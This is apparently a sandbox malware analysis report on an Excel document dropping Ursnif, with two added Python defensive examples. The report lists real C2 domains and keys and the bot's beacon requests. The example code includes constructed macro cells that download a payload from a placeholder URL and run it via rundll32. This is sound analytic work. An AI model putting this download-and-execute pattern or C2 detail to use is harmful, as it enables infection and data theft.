Analysis Report document-1771131239.xls

Overview

General Information

Sample Name: document-1771131239.xls
Analysis ID: 381643
MD5: b058594669b275d186207929b4b32eeb
SHA1: f48e30b9e13cec95978232da40f1d2c279e91191
SHA256: 00a55a2ef2774d581e152e154a34e07fb231a4d5f0fc17a3cb1726fa02843243
Tags: IcedIDxls

Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 7.2.rundll32.exe.240000.1.raw.unpack Malware Configuration Extractor: Ursnif [[{"RSA Public Key": "Om1HeBhXBR6NHvmWFG5B2kyl5mdcRMsb8ux2uo9VgGW0O2LzHZKk3w9bxw9stgphU0ayytcOYkK6GCNJlKSeMTZJ5WPgZiX+MaXiUccStEUTXkW1ubp0gdr16sb5U4M+rzWWPvc3s7bj9o1yqSJtP7PmMVp7E+3llLULQ9/DZbAD7SXaft6wcY8wFjSkI+8D"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]
Multi AV Scanner detection for domain / URL
Source: accesslinksgroup.com Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: document-1771131239.xls Virustotal: Detection: 43%
Source: document-1771131239.xls Metadefender: Detection: 16%
Source: document-1771131239.xls ReversingLabs: Detection: 18%
Machine Learning detection for dropped file
Source: C:\Users\user\fikftkm.thj2 Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.rundll32.exe.1e0000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 7.2.rundll32.exe.10000000.11.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003112D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 7_2_003112D4

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 0104[1].gif.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe

Networking:

IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 207.174.213.126 207.174.213.126
Source: Joe Sandbox View IP Address: 162.241.62.4 162.241.62.4
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: global traffic HTTP traffic detected:
    GET /joomla/3aDSi90Odm4t/ZQseS7mEKQ6/SSE8Q3crCb0l7w/wIvpan0x1HXuZM3ORESMa/ajJiFPV258iNRovg/KQl9frzLJWGuawc/zcW8IHCp_2F8n02ZSX/SkuilVzI4/iu_2BjoqlDfmKu_2BuVf/kGitIl_2Bi7_2Fz9R6X/Y0sd4k8W3UrfPrzXwVLvdK/7G4iHN0OcM5_2/FPqyROS_/2BKDOK08.akk HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: urs-world.com
    DNT: 1
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: urs-world.com
    DNT: 1
    Connection: Keep-Alive
    Cookie: PHPSESSID=ca3tpsqcuj8l4okgqq21dsnjv6; lang=en
Source: global traffic HTTP traffic detected:
    GET /joomla/nFzk0Q7K/E1_2F1CEOHcU967kDpuCuCt/FPWRV6etYO/3uHaVD2_2B5fz4cnT/KUnSOvHj3DDx/LEjym6jOHzl/FeVIuhKblVVnxm/VI6rPV0WA0nCSJBKKjggZ/tlqJBc8y5_2Bbir_/2BCa9ubsQQgGaAg/T_2BNOyNXybfs33Qg4/rm7s6e4PI/6eyckn37N5jlypeo4jei/kAPiG95T_2BrCVeX6k0/F0E8zUcKkiS/aU.akk HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: urs-world.com
    DNT: 1
    Connection: Keep-Alive
    Cookie: lang=en
Source: global traffic HTTP traffic detected:
    GET /joomla/DzJ1zVBWb/1fmYW7HPNqRQhz6Za_2F/CEQgEHh67hkPdvwOSdi/nEqyJXm1CwTWVs2C_2Fr_2/BvjUBKxN9qSpN/cMrTRJ9N/ryJsB4qGY2XHLtxrLDi6xNR/Qw5QsDCu2a/1byqzLlxunqNEdxwm/2jiPBdqZB0a1/q3egY2VhZv3/_2B8x5gL2kXG3P/aL1YXODRbtNtTkBrj3PS7/G.akk HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: urs-world.com
    DNT: 1
    Connection: Keep-Alive
    Cookie: lang=en
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2164816760.0000000001CE0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: vts.us.com
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000007.00000002.2424493399.0000000000960000.00000002.00000001.sdmp String found in binary or memory: http://urs-world.com/joomla/DzJ1zVBWb/1fmYW7HPNqRQhz6Za_2F/CEQgEHh67hkPdvwOSdi/nEqyJXm1CwTWVs2C
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2164816760.0000000001CE0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2164816760.0000000001CE0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown HTTPS traffic detected: 207.174.213.126:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.241.62.4:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.129.4:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49172 version: TLS 1.2
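The GET requests to urs-world.com above are the bot's check-ins: the Host is one of the four c2_domain entries in the extracted configuration, and the long paths made of random-looking segments with _2F and _2B tokens are the Ursnif/ISFB URI style. Two practical points follow from the configuration. First, bing.com and update4.microsoft.com are best treated as decoys (ISFB configurations routinely pad the C2 list with legitimate domains), so a blocklist built from this report should contain only under17.com and urs-world.com. Second, the path can be reduced to the encoded payload: the scheme assumed here (an assumption, not something the report states) is base64 with '/' and '+' escaped as _2F and _2B, slashes inserted at arbitrary points, one fixed leading directory ("joomla") and one fixed extension (".akk"). Undoing that on the first request yields exactly 192 base64 characters that decode to 144 bytes, which supports the reading; the bytes are ciphertext (the serpent_key in the configuration is what the bot uses), and the example stops there. The Python below is an added example, not part of the report: the bot request is the report's first request line re-assembled with CRLFs, and the benign request is constructed for contrast.

```python
import base64
import re
from urllib.parse import urlsplit

# Hosts from the configuration the report extracted. The first two are assumed
# to be decoys (ISFB configs routinely list legitimate domains); block the rest.
C2_DOMAINS = ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"]
DECOY_DOMAINS = {"bing.com", "update4.microsoft.com"}

# Assumed URI scheme: base64 with '/' and '+' escaped as _2F and _2B, slashes
# inserted at random points, one fixed leading directory, one fixed extension.
ESCAPES = {"_2F": "/", "_2B": "+"}

# Re-assembled from the first request line in the report (CRLFs restored).
BOT_REQUEST = (
    "GET /joomla/3aDSi90Odm4t/ZQseS7mEKQ6/SSE8Q3crCb0l7w/wIvpan0x1HXuZM3ORESMa/"
    "ajJiFPV258iNRovg/KQl9frzLJWGuawc/zcW8IHCp_2F8n02ZSX/SkuilVzI4/"
    "iu_2BjoqlDfmKu_2BuVf/kGitIl_2Bi7_2Fz9R6X/Y0sd4k8W3UrfPrzXwVLvdK/"
    "7G4iHN0OcM5_2/FPqyROS_/2BKDOK08.akk HTTP/1.1\r\n"
    "Accept: text/html, application/xhtml+xml, */*\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: urs-world.com\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
# Constructed benign request for contrast.
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"


def parse_request(raw):
    """Return (host, path) from a raw HTTP/1.x request; host is lower-cased."""
    lines = raw.split("\r\n")
    _method, target, _version = lines[0].split(" ", 2)
    host = ""
    for line in lines[1:]:
        if line.lower().startswith("host:"):
            host = line.split(":", 1)[1].strip().lower()
    return host, urlsplit(target).path


def recover_base64(path):
    """Join the segments after the leading directory, drop the extension and
    undo the underscore escapes. Returns the base64 text ('' if too short)."""
    segments = [s for s in path.split("/") if s]
    if len(segments) < 2:
        return ""
    joined = "".join(segments[1:])       # drop the fixed "joomla" directory
    joined = joined.rsplit(".", 1)[0]    # drop the fixed ".akk" extension
    for esc, ch in ESCAPES.items():
        joined = joined.replace(esc, ch)
    return joined


def decode_blob(b64):
    """Base64-decode with padding repaired; b'' if the text is not base64."""
    try:
        return base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
    except ValueError:
        return b""


def triage(raw):
    """Host check against the config plus URI-style check; also reports how
    much encoded data the path carried."""
    host, path = parse_request(raw)
    findings = []
    if host in C2_DOMAINS:
        tag = "decoy" if host in DECOY_DOMAINS else "block"
        findings.append(f"host {host} is in extracted c2_domain list ({tag})")
    if path.count("/") >= 6 and re.search(r"_2[BF]", path):
        findings.append("segmented path with _2B/_2F escapes (Ursnif URI style)")
    b64 = recover_base64(path)
    blob = decode_blob(b64)
    return {"host": host, "b64_len": len(b64), "blob_len": len(blob),
            "findings": findings}


if __name__ == "__main__":
    for req in (BOT_REQUEST, BENIGN_REQUEST):
        print(triage(req))
```

The favicon.ico request with the PHPSESSID cookie does not fit the pattern and is most likely Internet Explorer fetching the site icon after the bot's first contact, so a rule keyed on the segmented path alone will not match it; the Host check still does.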

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please clic 14
Source: Screenshot number: 8 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please clic 14 R
Source: Screenshot number: 12 Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 12 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15 Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 16 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click Enab
Source: Screenshot number: 16 Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 18 WHY I CANNOTOPEN THIS DOCUMENT? 19 2
Found Excel 4.0 Macro with suspicious formulas
Source: document-1771131239.xls Initial sample: CALL
Source: document-1771131239.xls Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-1771131239.xls Initial sample: Sheet size: 4081
Source: document-1771131239.xls Initial sample: Sheet size: 12790
Found obfuscated Excel 4.0 Macro
Source: document-1771131239.xls Initial sample: High usage of CHAR() function: 40
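The three findings above (CALL and EXEC formulas, two abnormally large hidden macro sheets, 40 uses of CHAR()) describe the usual Excel 4.0 pattern: the library name, the export name and the command line are assembled one character at a time so that no readable string exists in any cell, then handed to CALL (here URLDownloadToFileA, per the Software Vulnerabilities section; the downloaded 0104[1].gif and C:\Users\user\fikftkm.thj2 share a SHA256 later in the report) and EXEC. The Python below is an added example, not the sample's macro: it folds CHAR() runs back into literals, inlines cells that reduce to a bare string into the formulas that reference them, and then scores the result the way the report's heuristics do. The cell contents are constructed for illustration (the URL is a placeholder); only the library, export and command line match what the report shows the document doing.

```python
import re

CHAR_RUN = re.compile(r"CHAR\(\d+\)(?:\s*&\s*CHAR\(\d+\))*")
CHAR_ONE = re.compile(r"CHAR\((\d+)\)")
STRING_LIT = re.compile(r'("(?:[^"]|"")*")')      # Excel doubles quotes inside strings
CELL_REF = re.compile(r"\$?([A-Z]{1,3})\$?(\d+)(?!\()")
SUSPICIOUS_FUNCS = ("CALL", "EXEC", "REGISTER", "RUN", "FORMULA")
SUSPICIOUS_TEXT = ("URLDownloadToFileA", "rundll32", "regsvr32", "DllRegisterServer")

# Constructed cells showing the idiom the report flags; the URL is a placeholder.
SAMPLE_CELLS = {
    "A1": "=CHAR(117)&CHAR(114)&CHAR(108)&CHAR(109)&CHAR(111)&CHAR(110)",
    "A2": "=CHAR(85)&CHAR(82)&CHAR(76)&CHAR(68)&CHAR(111)&CHAR(119)&CHAR(110)&CHAR(108)"
          "&CHAR(111)&CHAR(97)&CHAR(100)&CHAR(84)&CHAR(111)&CHAR(70)&CHAR(105)&CHAR(108)"
          "&CHAR(101)&CHAR(65)",
    "A3": '=CALL(A1,A2,"JJCCJJ",0,"http://example.invalid/0104.gif","..\\fikftkm.thj2",0,0)',
    "A4": '=EXEC("rundll32 ..\\fikftkm.thj2,DllRegisterServer")',
    "A5": "=HALT()",
}


def quote(text):
    """Wrap text as an Excel string literal."""
    return '"' + text.replace('"', '""') + '"'


def fold_char_runs(formula):
    """Replace each CHAR(n)&CHAR(m)&... run with the string literal it builds."""
    def repl(m):
        return quote("".join(chr(int(n)) for n in CHAR_ONE.findall(m.group(0))))
    return CHAR_RUN.sub(repl, formula)


def literal_value(formula):
    """Return the string if the formula is just ="literal", else None."""
    m = re.fullmatch(r'="((?:[^"]|"")*)"', formula.strip())
    return m.group(1).replace('""', '"') if m else None


def resolve_refs(cells):
    """Fold CHAR() runs, then inline cells that reduce to a bare string into
    the formulas that reference them (only outside string literals)."""
    folded = {ref: fold_char_runs(f) for ref, f in cells.items()}
    literals = {}
    for ref, formula in folded.items():
        value = literal_value(formula)
        if value is not None:
            literals[ref] = value

    def inline(m):
        key = m.group(1) + m.group(2)
        return quote(literals[key]) if key in literals else m.group(0)

    resolved = {}
    for ref, formula in folded.items():
        parts = STRING_LIT.split(formula)      # odd indexes are string literals
        for i in range(0, len(parts), 2):
            parts[i] = CELL_REF.sub(inline, parts[i])
        resolved[ref] = "".join(parts)
    return resolved


def triage(cells):
    """Count CHAR() calls (the report's obfuscation heuristic) and list the
    suspicious functions and strings visible once the cells are resolved."""
    char_calls = sum(len(CHAR_ONE.findall(f)) for f in cells.values())
    resolved = resolve_refs(cells)
    hits = []
    for ref, formula in resolved.items():
        for fn in SUSPICIOUS_FUNCS:
            if re.search(r"(?<![A-Z.])" + fn + r"\(", formula):
                hits.append((ref, fn))
        for text in SUSPICIOUS_TEXT:
            if text.lower() in formula.lower():
                hits.append((ref, text))
    return {"char_calls": char_calls, "resolved": resolved, "hits": hits}


if __name__ == "__main__":
    result = triage(SAMPLE_CELLS)
    for ref, formula in result["resolved"].items():
        print(ref, formula)
    print(result["char_calls"], result["hits"])
```

On a real file the cell formulas come from a BIFF parser (oletools' plugin_biff or XLMMacroDeobfuscator); this example handles the CHAR()&CHAR() idiom only, not cells written at run time with FORMULA() or values pulled from defined names, which need the same inlining step applied to those writes.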
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001D9F NtMapViewOfSection, 7_2_10001D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001EB5 GetProcAddress,NtCreateSection,memset, 7_2_10001EB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002375 NtQueryVirtualMemory, 7_2_10002375
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003183B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 7_2_003183B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031B341 NtQueryVirtualMemory, 7_2_0031B341
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F 7_2_001E348F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 7_2_001E1918
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3314 7_2_001E3314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 7_2_001E1000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 7_2_001E6424
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E4859 7_2_001E4859
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E554B 7_2_001E554B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E237B 7_2_001E237B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E247B 7_2_001E247B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E5C76 7_2_001E5C76
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1374 7_2_001E1374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E596E 7_2_001E596E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1B95 7_2_001E1B95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3A85 7_2_001E3A85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3FA8 7_2_001E3FA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3BDB 7_2_001E3BDB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E5AF6 7_2_001E5AF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E20EE 7_2_001E20EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E52EC 7_2_001E52EC
